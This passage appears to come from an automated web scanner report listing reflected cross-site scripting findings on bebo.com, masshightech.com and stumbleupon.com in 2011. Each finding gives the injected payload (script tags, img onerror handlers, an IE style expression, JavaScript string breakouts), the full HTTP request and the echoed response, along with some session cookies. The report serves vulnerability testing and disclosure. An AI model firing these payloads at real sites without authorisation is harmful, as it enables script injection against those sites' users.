This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/searchce915'%3be214f87d530 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14166
Date: Wed, 06 Jul 2011 14:07:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
em.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/searchce915';e214f87d530/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.40. http://www.bebo.com/c/search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46c55<script>alert(1)</script>490543c8fe5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/search46c55<script>alert(1)</script>490543c8fe5 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14359
Date: Wed, 06 Jul 2011 14:07:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/search46c55<script>alert(1)</script>490543c8fe5 page, please try again.</div>
...[SNIP]...
2.41. http://www.bebo.com/c/search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9366"><img%20src%3da%20onerror%3dalert(1)>4802e5762f0 was submitted in the REST URL parameter 2. This input was echoed as b9366"><img src=a onerror=alert(1)>4802e5762f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/searchb9366"><img%20src%3da%20onerror%3dalert(1)>4802e5762f0 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14460
Date: Wed, 06 Jul 2011 14:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-searchb9366"><img src=a onerror=alert(1)>4802e5762f0" >
...[SNIP]...
2.42. http://www.bebo.com/c/search [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c968d'><script>alert(1)</script>e9f84b94b5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/searchc968d'><script>alert(1)</script>e9f84b94b5a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14377
Date: Wed, 06 Jul 2011 14:07:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/searchc968d'><script>alert(1)</script>e9f84b94b5a&QueryString=&Lang=nl'>
...[SNIP]...
2.43. http://www.bebo.com/c/share [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ff82'><script>alert(1)</script>b4c625008d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/share9ff82'><script>alert(1)</script>b4c625008d9 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14383
Date: Wed, 06 Jul 2011 11:21:10 GMT
Connection: close
Set-Cookie: bvid=e85b586c-d7d6-477a-9024-84c53f54bbbf|1309951270768; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT
Set-Cookie: bdaysession=5e04af402d66ef5c146613174; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112110; domain=.bebo.com; path=/
Set-Cookie: bvid=8809abcd-d223-4323-b75e-c04e9b76a3ff|1309951270774; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/share9ff82'><script>alert(1)</script>b4c625008d9&QueryString=&Lang=nl'>
...[SNIP]...
2.44. http://www.bebo.com/c/share [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fda8'%3bf9fe007e964 was submitted in the REST URL parameter 2. This input was echoed as 2fda8';f9fe007e964 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/share2fda8'%3bf9fe007e964 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14172
Date: Wed, 06 Jul 2011 11:21:11 GMT
Connection: close
Set-Cookie: bvid=47f49dbe-4df3-4765-8e0a-63c4d257e18c|1309951271023; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT
Set-Cookie: bdaysession=51447a44a21fd851902326938; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112111; domain=.bebo.com; path=/
Set-Cookie: bvid=7f8404f5-7ebb-4d51-970a-de35a4e5580c|1309951271028; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
lem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/share2fda8';f9fe007e964/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.45. http://www.bebo.com/c/share [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9bac"><img%20src%3da%20onerror%3dalert(1)>daa7b2d9145 was submitted in the REST URL parameter 2. This input was echoed as d9bac"><img src=a onerror=alert(1)>daa7b2d9145 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/shared9bac"><img%20src%3da%20onerror%3dalert(1)>daa7b2d9145 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14466
Date: Wed, 06 Jul 2011 11:21:10 GMT
Connection: close
Set-Cookie: bvid=f4aa0b79-fb75-4839-896b-18502fafe041|1309951270201; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:09 GMT
Set-Cookie: bdaysession=1670347d2dc968af853000382; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112110; domain=.bebo.com; path=/
Set-Cookie: bvid=43120a6e-b3cb-4d1e-82ab-8eeae1353597|1309951270209; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-shared9bac"><img src=a onerror=alert(1)>daa7b2d9145" >
...[SNIP]...
2.46. http://www.bebo.com/c/share [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a620<script>alert(1)</script>d95bd966933 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/share4a620<script>alert(1)</script>d95bd966933 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14365
Date: Wed, 06 Jul 2011 11:21:12 GMT
Connection: close
Set-Cookie: bvid=d5af19e9-5d0f-4dbe-97ed-617f219bb6a2|1309951272151; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:11 GMT
Set-Cookie: bdaysession=4f68a69fc022b7cf48465072; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112112; domain=.bebo.com; path=/
Set-Cookie: bvid=519a5c42-9ce5-4d3c-bcf9-d51e0e8dd574|1309951272158; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/share4a620<script>alert(1)</script>d95bd966933 page, please try again.</div>
...[SNIP]...
2.47. http://www.bebo.com/c/skin/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46f4c'><script>alert(1)</script>dbd39a2012b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/skin46f4c'><script>alert(1)</script>dbd39a2012b/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14413
Date: Wed, 06 Jul 2011 14:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/skin46f4c'><script>alert(1)</script>dbd39a2012b/index&QueryString=&Lang=nl'>
...[SNIP]...
2.48. http://www.bebo.com/c/skin/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a55"><img%20src%3da%20onerror%3dalert(1)>ab82706a93a was submitted in the REST URL parameter 2. This input was echoed as b6a55"><img src=a onerror=alert(1)>ab82706a93a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/skinb6a55"><img%20src%3da%20onerror%3dalert(1)>ab82706a93a/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14496
Date: Wed, 06 Jul 2011 14:07:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-skinb6a55"><img src=a onerror=alert(1)>ab82706a93a-index" >
...[SNIP]...
2.49. http://www.bebo.com/c/skin/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0e56'%3be07a77c1e62 was submitted in the REST URL parameter 2. This input was echoed as e0e56';e07a77c1e62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/skine0e56'%3be07a77c1e62/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14202
Date: Wed, 06 Jul 2011 14:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/skine0e56';e07a77c1e62/index/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pa
...[SNIP]...
2.50. http://www.bebo.com/c/skin/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59944<script>alert(1)</script>a37e8255df9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/skin59944<script>alert(1)</script>a37e8255df9/index HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14395
Date: Wed, 06 Jul 2011 14:07:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/skin59944<script>alert(1)</script>a37e8255df9/index page, please try again.</div>
...[SNIP]...
2.51. http://www.bebo.com/c/skin/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf96b"><img%20src%3da%20onerror%3dalert(1)>310f8a32d96 was submitted in the REST URL parameter 3. This input was echoed as bf96b"><img src=a onerror=alert(1)>310f8a32d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/skin/indexbf96b"><img%20src%3da%20onerror%3dalert(1)>310f8a32d96 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14222
Date: Wed, 06 Jul 2011 14:07:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-skin-indexbf96b"><img src=a onerror=alert(1)>310f8a32d96" >
...[SNIP]...
2.52. http://www.bebo.com/c/skin/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c3c9'><script>alert(1)</script>b7a7735aa7d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/skin/index5c3c9'><script>alert(1)</script>b7a7735aa7d HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14128
Date: Wed, 06 Jul 2011 14:07:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/skin/index5c3c9'><script>alert(1)</script>b7a7735aa7d&QueryString=&Lang=fr'>
...[SNIP]...
2.53. http://www.bebo.com/c/skin/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f827'%3b196d2336e59 was submitted in the REST URL parameter 3. This input was echoed as 9f827';196d2336e59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/skin/index9f827'%3b196d2336e59 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 13934
Date: Wed, 06 Jul 2011 14:07:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
agName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/skin/index9f827';196d2336e59/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...
2.54. http://www.bebo.com/c/skin/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/skin/index

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aff37<img%20src%3da%20onerror%3dalert(1)>5e4d93fe10c was submitted in the REST URL parameter 3. This input was echoed as aff37<img src=a onerror=alert(1)>5e4d93fe10c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/skin/indexaff37<img%20src%3da%20onerror%3dalert(1)>5e4d93fe10c HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14204
Date: Wed, 06 Jul 2011 14:07:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div id="content" class="content-wrap">Could not find action: indexaff37<img src=a onerror=alert(1)>5e4d93fe10c.</div>
...[SNIP]...
2.55. http://www.masshightech.com/tech-news-widget/parser/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.masshightech.com
Path:   /tech-news-widget/parser/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 50df4<script>alert(1)</script>a5ecb4fdf09 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tech-news-widget/parser/?limit=5&feedName=mass_high_tech&feed=http://www.masshightech.com/rss.html&callback=jsonp130996082326950df4<script>alert(1)</script>a5ecb4fdf09&_=1309960828682 HTTP/1.1
Host: www.masshightech.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 2358
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xxx.nbttijhiufdi.dpn-wtfsw=e243cf7e3660;expires=Wed, 06-Jul-11 14:13:18 GMT;path=/

jsonp130996082326950df4<script>alert(1)</script>a5ecb4fdf09({"items":[{"title":"Precision Biopsy closes $2.5M funding","link":"http:\/\/www.masshightech.com\/stories\/2011\/07\/04\/daily17-Precision-Biopsy-closes-25M-funding.html","publishDate":"July 6, 2011",
...[SNIP]...
2.56. http://www.stumbleupon.com/submit [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3945d"style%3d"x%3aexpression(alert(1))"b82259b5aa was submitted in the url parameter. This input was echoed as 3945d"style="x:expression(alert(1))"b82259b5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx3945d"style%3d"x%3aexpression(alert(1))"b82259b5aa HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49079
Date: Wed, 06 Jul 2011 11:16:01 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
